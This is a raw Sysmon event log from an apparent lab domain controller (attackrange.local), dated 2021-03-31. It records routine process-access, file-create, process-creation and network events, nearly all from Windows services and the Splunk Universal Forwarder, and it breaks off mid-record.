12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.074{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20175A86E19D73DA6F25BAE84506DEFB,SHA256=1D925A409074793BAAA35AAC7E28FFA20E99FD813B3976900046FA90D3ECC28E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:51.089{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CAB47D57A61F3CA06AA5307A9D13C03,SHA256=1F1899ED71738C63F0B6290FB379C9F082631828BC9ED9CD27AFBE38661F87C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:52.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6955668D1CAE45B45F30C3D7136FF38B,SHA256=235A484873FE5C52AD191E525CA8DD0873E6C4A46C0FB956013C8A861754C8DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:53.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1AFB410DE71F369498DE4DEF6BDC99,SHA256=E3647DE373318289F14365B5556566DA303801B2EB50FF64C8C6B758929C6EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=144752BC0472DACA8D8774E8A17E7BEB,SHA256=43CE44012AC45F18C9587E3A6B7D7A220544259573A5567E691E87DD259560E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A80D9B4AD5949BF29894BF1C5657A7,SHA256=6AE46E6F65A933E9209809BD89B61087CB1E629AB56C694701B50FB6E0D79817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.120{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B0681D11828E7B7BA7D9682DC15BDF,SHA256=A69312ACAC217586633869E1C34B2C442F2D22760F0BFED5FB2562A76E210965,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.490{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53731-false10.0.1.12-8000- 23542300x800000000000000011500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:55.167{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=205A6B9EF313065F6740452A3A571336,SHA256=4011FE520E49FD0D5A2C84120E5172E086C2EDCC1F0C181C4ECB03CE5864D195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:56.183{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6A12AD718701CB18E0A4076661FE515,SHA256=9756CCD2DC2F53BC6D07B8890A56F1C079E5F46F6D01F76C17DAB37744781479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:57.214{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DB23FFDABCE60A5D791DAE32221A091,SHA256=2ECCDCCFDE533DA382FFDEB15D2E06684565196EE0610321CB3D3D7211E7F377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:58.229{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11786518BC0D16BC096559AE060A5504,SHA256=B810D02CB63CF3C9D8FFAF9A3490036558960307A04776978446B5402ECB6711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:59.260{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA90AC9D5E3227647E5F2BA1BF8E1512,SHA256=B38F8BCE737E6BA2060DD813776C9929FBE7334B32EBDAA2A9B6AE8E11E6FC13,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:59.631{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53732-false10.0.1.12-8000- 23542300x800000000000000011506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:00.276{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9656B8D9765D8E4ED60B38297C73CF,SHA256=FCE5E3E46642104E9BD625B548200F6FBE32F882E1A72EF9E52B8070BBFEAC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=610556D7583360293BFB7EA02FBC059D,SHA256=FDD182C0EBC2CD7A017B5C2471FBD9E130124292855D7B75ABA4B3857BC02206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DE3728E21641F89EAFB923C98EB3539,SHA256=805A7A961033418664F340EC510915F35C4B9F59DBB34056E803E62D8758C5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717C61A53DBA16FEB87FA6CE93BC119B,SHA256=A154DB14BAB9B287988B10A599F4BB4D5F6450B5065C2585069F8C8378F69694,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.855{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.401{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F386AE3134AA1FB654B5B11708926D,SHA256=FD3FF8DAF52B3D0A94E192D5CC18CC1C71CBC71C4CF6BBAB982B25B1A1F316DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.635{266CAFBE-66D7-6064-8301-00000000AE01}67961164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 